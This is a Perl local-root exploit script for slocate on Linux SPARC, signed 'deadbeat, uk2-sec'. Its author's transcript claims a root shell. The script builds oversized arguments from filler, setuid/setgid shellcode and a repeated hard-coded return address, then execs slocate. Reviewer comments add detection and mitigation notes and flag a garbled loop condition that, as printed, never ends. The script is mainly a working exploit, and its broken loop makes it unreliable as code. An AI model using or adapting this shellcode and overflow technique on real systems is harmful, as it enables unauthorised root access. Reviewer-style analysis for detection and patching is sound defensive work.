#!/usr/bin/perl
#slocate for linux-sparc ;)
#this is a local sploit for local people ;) we dont want any trouble here....
#deadbeat, uk2-sec..
#PRIVATE DONT DISTRIBUTE..
#
#[danny@localhost sploits]$ perl -w slocate_sparc.pl 12
#[+]Trying addr: 0x500c4dbc
#
#sh-2.05b#id
#uid=0(root) gid=0(root) groups=0(root)
#
# Analyst notes (added in review; the code below is unchanged apart from
# restored line breaks and indentation):
#
# Purpose: proof-of-concept that runs /usr/bin/slocate with two oversized
# command-line arguments (-c and -r) built from filler words, a machine-code
# payload and a repeated 32-bit address. The author's transcript above claims
# a root shell. The affected slocate version and the privileges the binary
# runs with are not stated on this page (presumably it is installed set-id;
# confirm against the package under investigation).
#
# Usage: one optional argument, an integer added to the hard-coded address.
# The transcript's "12" yields 0x500c4db0 + 0xc = 0x500c4dbc.
#
# Detection: the observable artefact is an execve of slocate whose -c / -r
# arguments are kilobytes long and consist mostly of non-printable bytes.
# Process auditing that records execve arguments will capture it.
#
# Mitigation: run a vendor-patched slocate and review whether the binary
# needs any set-id bit at all. The script depends on a fixed address plus a
# hand-tuned offset, so address-space randomisation works against it.

# Payload bytes. The author labels the first two 12-byte groups; the remaining
# 48 bytes are not documented on the page. Given the "sh-2.05b#" prompt in the
# transcript they presumably start a shell (not disassembled here).
$hell = "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10". #setuid(0)
"\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10". #setgid(0)
"\x2d\x06\xd8\x9a\xac\x15\xa1\xbe\x2f\x0b\xdc\xda\x90\x0b\x80\x0e".
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\x6f\xf0".
"\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x10";

# Base address later written repeatedly at the tail of the -r argument.
# It is hard-coded, so it only fits one specific memory layout.
$ret = 0x500c4db0;
# Loop counts (not byte counts): each iteration appends one 4-byte word.
$len0 = 1024;
$len1 = 1024;
# 4-byte filler word that the author names "nop".
$nop = "\x80\x1c\x40\x11";
# Adjustment added to $ret; taken verbatim from the command line, no validation.
$offset = 0;
if (@ARGV == 1){
    $offset = $ARGV[0];
}
# -c argument: $len0 copies of the filler word (4 * $len0 bytes).
for($i=0;$i <$len0;$i++){
    $buf0 .=$nop;
}
# -r argument, part 1: filler words. The count leaves room for the payload
# plus a further 100 iterations' worth.
for($i=0;$i<($len1 - length($hell)-100);$i++){
    $buf1 .=$nop;
}
# -r argument, part 2: the payload itself.
$buf1 .=$hell;
print ("[+]Trying addr: 0x", sprintf('%lx', ($ret + $offset)),"\n");
# pack 'l' produces a signed 32-bit value in the host's native byte order.
$new_ret = pack('l', ($ret+$offset));
# -r argument, part 3: append the packed address repeatedly.
# NOTE(review): as printed, the loop condition is the comma expression
# `$i ,$buf1`. Its value is $buf1, which is always true once non-empty, so this
# loop does not terminate and the exec below is never reached. The text looks
# damaged in extraction and is left exactly as found.
for($i += length($hell); $i ,$buf1; $i +=4){
    $buf1 .=$new_ret;
}
# Single-string form of exec: both buffers are interpolated into one command
# line, and Perl may hand that string to the shell if it contains shell
# metacharacters. exec replaces the current process, so nothing runs after it.
exec("/usr/bin/slocate -c $buf0 -r $buf1");